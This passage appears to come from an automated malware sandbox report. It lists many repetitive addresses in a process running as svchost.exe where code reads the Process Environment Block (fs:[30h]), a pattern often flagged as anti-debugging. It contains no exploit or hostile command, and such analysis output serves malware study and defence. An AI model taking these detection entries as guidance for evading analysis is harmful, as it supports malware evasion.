                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]2_2_030E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]2_2_03032582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]2_2_03064588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]2_2_0306E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]2_2_030B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]2_2_030545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]2_2_0306E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]2_2_030365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]2_2_0306A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]2_2_0305E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]2_2_030325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]2_2_0306C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]2_2_03068402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]2_2_0302E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]2_2_0302C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]2_2_030B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]2_2_0306A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]2_2_0306E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]2_2_030EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]2_2_0302645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]2_2_0305245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]2_2_030BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]2_2_0305A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]2_2_030EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]2_2_030364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]2_2_030644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]2_2_030BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]2_2_030304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]2_2_030AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]2_2_0305EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]2_2_030F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]2_2_030E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]2_2_030C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]2_2_030FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]2_2_030D8B42
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]
